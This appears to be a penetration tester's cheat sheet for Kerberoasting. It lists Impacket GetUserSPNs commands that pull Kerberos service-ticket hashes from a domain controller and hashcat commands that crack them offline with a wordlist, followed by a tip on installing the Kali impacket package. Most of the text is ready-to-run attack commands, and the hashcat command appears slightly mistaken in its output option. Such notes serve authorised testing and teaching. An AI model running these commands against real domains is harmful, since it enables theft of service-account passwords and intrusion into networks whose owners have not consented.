Kerberoasting

GetUserSPNs.py

#Every user can request TGS from any DC for any service with a registered SPN belonging to a service account (not a hostbased SPN). The DC does not validate the users request and whether the user is authorised. The TGS is passed to the user with the NT Hash of the service account. If the service accounts password is weak it can be cracked offline.

cd Impacket/examples

#Search for SPN's with no credentials

Get-UserSPNs -dc-ip 10.0.0.1 domain.loc/username -no-pass

#Search for SPN's with credentials

Get-UserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1

#Search for SPN's with credentials and request hash

Get-UserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1 -request -outputfile kerb.txt

#Cracking the hash (Kerberos 5 TGS-REP etype 23)

hashcat -m 13100 -a 0 -outputfile kerb.txt rockyou.txt --force

#show cracked password

hashcat -m 13100 --show kerb.txt

note:

Get-UserSPNs.py when installed from github can error with the following:

'NoneType' object has no attribute 'getCredential'

Install the repo Kali version with the following command:

sudo apt install python3-impacket

The command changes and doesnt require CD'ing into the example directory

impacket-GetUserSPNs fqdn.com/svc_user:Password1234 -dc-ip 10.0.0.1 -request